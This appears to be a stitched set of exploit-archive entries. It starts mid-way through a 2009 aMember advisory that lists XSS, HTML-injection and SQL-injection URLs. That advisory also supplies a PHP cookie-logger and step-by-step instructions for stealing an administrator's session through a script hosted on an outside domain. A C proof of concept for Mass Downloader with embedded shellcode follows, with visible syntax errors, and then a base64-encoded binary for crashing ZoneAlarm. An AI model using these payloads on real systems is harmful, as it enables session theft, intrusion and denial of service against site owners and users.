- More files are affected. (discloses full path to the file)
Cross Site Scripting (admin only - might not survive a login screen!)
http://www.website.tld/amember/admin/users.php?letter="><script>alert(0)</script>
http://www.website.tld/amember/admin/users.php?status="><script>alert(0)</script>
http://www.website.tld/amember/admin/users.php?letter="><script>alert(0)</script>
http://www.website.tld/amember/admin/users.php?action=<script>alert(0)</script>
http://www.website.tld/amember/admin/setup.php?notebook=<script>alert(0)</script>
http://www.website.tld/amember/admin/newsletter_threads.php?action=edit&thread_id="><script>alert(0)</script>
http://www.website.tld/amember/admin/newsletter_guests.php?action=edit&guest_id="><script>alert(0)</script>
http://www.website.tld/amember/admin/products.php?action=<script>alert(0)</script>
http://www.website.tld/amember/admin/protect.php?action=<script>alert(0)</script>
http://www.website.tld/amember/admin/coupons.php?action=<script>alert(0)</script>
http://www.website.tld/amember/admin/aff_banners.php?action=edit_banner&banner_id="><script>alert(0)</script>
http://www.website.tld/amember/admin/aff_banners.php?action=edit_link&banner_id="><script>alert(0)</script>
http://www.website.tld/amember/admin/email_templates.php?a=edit&tpl=<script>alert(0)</script>
http://www.website.tld/amember/aff.php?action=<script>alert(0)</script> (this might only affect attacker)
- More files might be affected.
HTML Injection: (insert: "><script>alert(0)</script> into the mentioned forms)
http://www.website.tld/amember/signup.php (first- and last-name)
http://www.website.tld/amember/aff_signup.php (first- and last-name)
http://www.website.tld/amember/profile.php (first- and last-name)
HTML Injection Exception: (this injection might only be possible to be seen by the attacker)
http://www.website.tld/amember/aff.php?action=payout_info (other payment plugins might be vulnerable too)
Affeced Sites (by HTML Injection):
http://www.website.tld/amember/admin/index.php (if the menu user-lookup returns positive)
http://www.website.tld/amember/admin/users.php?q=VALIDUSERNAME&q_where=anywhere&action=search_by_string
http://www.website.tld/amember/admin/users.php?status= (this will always return the HTML Injection)
http://www.website.tld/amember/admin/users.php?action=edit&member_id=VALIDUSERID
http://www.website.tld/amember/admin/users.php?action=actions&member_id=VALIDUSERID
http://www.website.tld/amember/admin/users.php?action=edit_payment&payment_id=VALIDPAYMENTID&member_id=VALIDUSERID
http://www.website.tld/amember/admin/users.php?letter=FIRSTLETTEROFYOURUSERNAME
-- More files might be affected.
SQL Injection: (requires admin access)
http://www.website.tld/amember/admin/access_log.php?order1='SQL'a.time+DESC&order2='SQL'a.time+DESC
http://www.website.tld/amember/admin/aff_clicks.php?year_month='SQL'&action=aff_sales
http://www.website.tld/amember/admin/products.php?action=delete&product_id='SQL'
-- More files might be affected, the depth of SQL Injection was not checked!
-:: Solution ::-
All the files are encrypted according to CGI Systems' website.
Questions and answers (quote)
I've downloaded aMember, but the source code is corrupted. How can I download it again ?
The source code is not corrupted, but it is encrypted with Zend Encoder or IonCube Encoder technology
Which essentially mean i was unable to find any solution to the problem.
I believe this vulnerability might be exploited in the wild due to it is very
easy to find and take advantage of. (if you know what you're looking for)
Addition: The most easy solution would be to use a regular expression to fix this issue.
-:: Ways of abusing the HTML Injection and XSS ::-
The following are examples of what you can input as first- and/or last-name:
"><SCRIPT SRC=//intern0t.net/.j>
- Works only in FireFox and NetScape 8.1-G (Gecko)
Protocol resolution in script tags. This particular variant was submitted by Łukasz Pilorz and was based
partially off of Ozh's protocol resolution bypass below. This cross site scripting example works in IE,
Netscape in IE rendering mode and Opera if you add in a </SCRIPT> tag at the end. However, this is
especially useful where space is an issue, and of course, the shorter your domain, the better. The ".j" is
valid, regardless of the encoding type because the browser knows it in context of a SCRIPT tag.
Firstname: "><script src="//intern0t.net/.j
Lastname: "></script> </
- Works in FireFox but should work in all browsers.
Firstname: "><iframe src="http://google.com
Lastname: "></iframe> </
- Works in all browsers.
Firstname: "><iframe src="//intern0t.net
Lastname: "></iframe> </
- Should work in all browsers as well. (tested in FireFox)
The following is an example of how a cookie stealer will work in conjunction with the exploit:
<script>document.location=%22http://evilsite.tld/cookiestealer.php?cookie=%22 %2B document.cookie;</script>
- The reason why "browser-hex" is used is because the above would else issue an error and thereby not work.
-- Reference about url encoding: http://www.blooberry.com/indexdot/html/topics/urlencoding.htm
CookieLogger:
<?php
function GetIP()
{
if (getenv("HTTP_CLIENT_IP") && strcasecmp(getenv("HTTP_CLIENT_IP"), "unknown"))
$ip = getenv("HTTP_CLIENT_IP");
else if (getenv("HTTP_X_FORWARDED_FOR") && strcasecmp(getenv("HTTP_X_FORWARDED_FOR"), "unknown"))
$ip = getenv("HTTP_X_FORWARDED_FOR");
else if (getenv("REMOTE_ADDR") && strcasecmp(getenv("REMOTE_ADDR"), "unknown"))
$ip = getenv("REMOTE_ADDR");
else if (isset($_SERVER['REMOTE_ADDR']) && $_SERVER['REMOTE_ADDR'] && strcasecmp($_SERVER['REMOTE_ADDR'], "unknown"))
$ip = $_SERVER['REMOTE_ADDR'];
else
$ip = "unknown";
return($ip);
}
function logData()
{
$ipLog="log.txt";
$cookie = $_SERVER['QUERY_STRING'];
$register_globals = (bool) ini_get('register_gobals');
if ($register_globals) $ip = getenv('REMOTE_ADDR');
else $ip = GetIP();
$rem_port = $_SERVER['REMOTE_PORT'];
$user_agent = $_SERVER['HTTP_USER_AGENT'];
$rqst_method = $_SERVER['METHOD'];
$rem_host = $_SERVER['REMOTE_HOST'];
$referer = $_SERVER['HTTP_REFERER'];
$date=date ("l dS of F Y h:i:s A");
$log=fopen("$ipLog", "a+");
if (preg_match("/\bhtm\b/i", $ipLog) || preg_match("/\bhtml\b/i", $ipLog))
fputs($log, "IP: $ip | PORT: $rem_port | HOST: $rem_host | Agent: $user_agent | METHOD: $rqst_method | REF: $referer | DATE{ : } $date | COOKIE: $cookie <br>");
else
fputs($log, "IP: $ip | PORT: $rem_port | HOST: $rem_host | Agent: $user_agent | METHOD: $rqst_method | REF: $referer | DATE: $date | COOKIE: $cookie \n\n");
fclose($log);
}
logData();
header ("Location: http://www.pichashare.com/Flash/lazytown_pirate.swf");
?>
When you have gotten a hash from the admin of the victim site you can issue:
Javascript:void(document.cookie="PHPSESSID=hash") (where hash is the PHPSESSID hash/cookie)
What's the first thing you could do as admin?
http://www.website.tld/amember/admin/backup.php
What's the best way to exploit the vulnerability?
1) Make a file named: .j (and upload to a domain which has a name equal to or shorter than 8 characters)
2) The file should contain the following:
HTML Code:
document.location='http://evilsite.tld/cookielogger.php?cookie=' + document.cookie;
3) Sign up and make you first name: (try aff_signup.php to avoid paying!)
"><script src="//evilsite.tld/.j
4) Make your last name:
"></script> </
5) Make your username:
aaaaaaaaa
6) After signing up, go to profile.php and make sure the first- and last-name are correct.
7) Wait or social engineer the administrator to click: "Browse Users" in his admin panel, that's all!
Conclusion:
The vendor was (originally) not contacted due to they have encrypted all of
the files and because i believe in full disclosure and open source!
The vendor was contacted the 25th May due to the vulnerability might be
exploited more than usual in the wild after public disclosure the 14th May.
Reference:
http://forum.intern0t.net/exploits-vulnerabilities-pocs/1018-intern0t-amember-3-1-7-multiple-vulnerabilities.html
Disclosure Information:
- Vulnerabilities found early start of May 2009.
- Advisory finished and published 14th May on InterN0T.
- Bugtraq (SecurityFocus) and Milw0rm contacted the 24th May.
- OSVDB, CVE (Mitre) and CGI Systems contacted the 25th May.
# milw0rm.com [2009-05-29]

163
platforms/windows/dos/32420.c Executable file
View file

@ -0,0 +1,163 @@
source: http://www.securityfocus.com/bid/31406/info
Mass Downloader is prone to a remote denial-of-service vulnerability.
Exploiting this issue allows remote attackers to crash the application and trigger denial-of-service conditions, denying further service to legitimate users. Given the nature of this issue, attackers may also be able to run arbitrary code, but this has not been confirmed.
Mass Downloader 2.6 is vulnerable; other versions may also be affected.
#include<windows.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <errno.h>
#include <netdb.h>
unsigned char bind_scode[] =
"\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49"
"\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36"
"\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48\x34"
"\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x30\x41\x44\x41"
"\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x4e\x4f\x4a\x4e\x46\x54"
"\x42\x30\x42\x50\x42\x50\x4b\x58\x45\x54\x4e\x53\x4b\x58\x4e\x37"
"\x45\x50\x4a\x47\x41\x30\x4f\x4e\x4b\x38\x4f\x44\x4a\x51\x4b\x48"
"\x4f\x55\x42\x42\x41\x30\x4b\x4e\x49\x44\x4b\x48\x46\x43\x4b\x38"
"\x41\x30\x50\x4e\x41\x53\x42\x4c\x49\x49\x4e\x4a\x46\x58\x42\x4c"
"\x46\x57\x47\x50\x41\x4c\x4c\x4c\x4d\x50\x41\x30\x44\x4c\x4b\x4e"
"\x46\x4f\x4b\x53\x46\x35\x46\x32\x46\x30\x45\x37\x45\x4e\x4b\x48"
"\x4f\x35\x46\x32\x41\x50\x4b\x4e\x48\x56\x4b\x38\x4e\x50\x4b\x54"
"\x4b\x48\x4f\x55\x4e\x31\x41\x30\x4b\x4e\x4b\x38\x4e\x41\x4b\x38"
"\x41\x30\x4b\x4e\x49\x58\x4e\x35\x46\x42\x46\x50\x43\x4c\x41\x43"
"\x42\x4c\x46\x36\x4b\x48\x42\x34\x42\x33\x45\x38\x42\x4c\x4a\x37"
"\x4e\x30\x4b\x48\x42\x34\x4e\x50\x4b\x48\x42\x57\x4e\x31\x4d\x4a"
"\x4b\x38\x4a\x46\x4a\x50\x4b\x4e\x49\x50\x4b\x48\x42\x38\x42\x4b"
"\x42\x30\x42\x50\x42\x30\x4b\x48\x4a\x36\x4e\x53\x4f\x35\x41\x33"
"\x48\x4f\x42\x46\x48\x35\x49\x58\x4a\x4f\x43\x48\x42\x4c\x4b\x57"
"\x42\x55\x4a\x46\x42\x4f\x4c\x48\x46\x50\x4f\x35\x4a\x46\x4a\x49"
"\x50\x4f\x4c\x38\x50\x30\x47\x55\x4f\x4f\x47\x4e\x43\x56\x41\x36"
"\x4e\x46\x43\x46\x50\x52\x45\x36\x4a\x37\x45\x36\x42\x30\x5a\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
unsigned char user_scode[] =
"\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49"
"\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36"
"\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48\x34"
"\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x30\x41\x44\x41"
"\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x4e\x4f\x4a\x4e\x46\x54"
"\x42\x30\x42\x50\x42\x50\x4b\x58\x45\x54\x4e\x53\x4b\x58\x4e\x37"
"\x45\x50\x4a\x47\x41\x30\x4f\x4e\x4b\x38\x4f\x44\x4a\x51\x4b\x48"
"\x4f\x55\x42\x42\x41\x30\x4b\x4e\x49\x44\x4b\x48\x46\x43\x4b\x38"
"\x41\x30\x50\x4e\x41\x53\x42\x4c\x49\x49\x4e\x4a\x46\x58\x42\x4c"
"\x46\x57\x47\x50\x41\x4c\x4c\x4c\x4d\x50\x41\x30\x44\x4c\x4b\x4e"
"\x46\x4f\x4b\x53\x46\x35\x46\x32\x46\x30\x45\x37\x45\x4e\x4b\x48"
"\x4f\x35\x46\x32\x41\x50\x4b\x4e\x48\x56\x4b\x38\x4e\x50\x4b\x54"
"\x4b\x48\x4f\x55\x4e\x31\x41\x30\x4b\x4e\x4b\x38\x4e\x41\x4b\x38"
"\x41\x30\x4b\x4e\x49\x58\x4e\x35\x46\x42\x46\x50\x43\x4c\x41\x43"
"\x42\x4c\x46\x36\x4b\x48\x42\x34\x42\x33\x45\x38\x42\x4c\x4a\x37"
"\x4e\x30\x4b\x48\x42\x34\x4e\x50\x4b\x48\x42\x57\x4e\x31\x4d\x4a"
"\x4b\x38\x4a\x46\x4a\x50\x4b\x4e\x49\x50\x4b\x48\x42\x38\x42\x4b"
"\x42\x30\x42\x50\x42\x30\x4b\x48\x4a\x36\x4e\x53\x4f\x35\x41\x33"
"\x48\x4f\x42\x46\x48\x35\x49\x58\x4a\x4f\x43\x48\x42\x4c\x4b\x57"
"\x42\x55\x4a\x46\x42\x4f\x4c\x48\x46\x50\x4f\x35\x4a\x46\x4a\x49"
"\x50\x4f\x4c\x38\x50\x30\x47\x55\x4f\x4f\x47\x4e\x43\x56\x41\x36"
"\x4e\x46\x43\x46\x50\x52\x45\x36\x4a\x37\x45\x36\x42\x30\x5a"
unsigned char ra_sp2[] = "\xFF\xBE\x3F\x7E"; //massdown.dll
unsigned char ra_sp3[] = "\x7B\x30\xE4\x77"; //massdown.dll
unsigned char nops1[12]; //14115 * \x90
unsigned char nops2[2068]; //2068 * \x90
int main(int argc, char **argv)
{
int i;
FILE* f;
char* ra=NULL;
char* scode=NULL;
printf("[+] Mass Downloader 2.6 Remote Denial of Service PoC \n");
printf("[+] Discovered by Ciph3r <www.expl0iters.ir>\n");
printf("[+] Code by Ciph3r Ciph3r_blackhat[at]yahoo[dot]com\n");
if ((argc!=3)||((atoi(argv[1])!=0)&&(atoi(argv[1])!=1))||((atoi(argv[2])!=0)&&(atoi(argv[2])!=1))){
printf("Usage: %s target Ciph3r\n",argv[0]);
printf("Where target is:\n");
printf("0: winXP Pro SP2\n");
printf("1: win2k\n")
return EXIT_SUCCESS;
}
for(i=0;i<12;i++) nops1[i]='\x90';
nops1[12]='\0';
for(i=0;i<2068;i++) nops2[i]='\x90';
nops2[2068]='\0';
if(atoi(argv[1])==0) ra=ra_sp2;
else ra=ra_sp3;
if(atoi(argv[2])==0) scode=bind_scode;
else scode=user_scode;
f=fopen("Ciph3r.exe","wb");
fprintf(f,nops1,ra,nops2,scode,'\xd','\xa');
fflush(f);
fclose(f);
printf("Ciph3r.exe created!\n");
return EXIT_SUCCESS;
}

126
platforms/windows/dos/32428.txt Executable file
View file

@ -0,0 +1,126 @@
source: http://www.securityfocus.com/bid/31431/info
ZoneAlarm Internet Security Suite is prone to a remote denial-of-service vulnerability that occurs in the TrueVector component when connecting to a malicious HTTP proxy.
ZoneAlarm Internet Security Suite 8.0.020 is vulnerable; other versions may also be affected.
za_crasher_proxy.b64 (Base64 Encoded File)
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
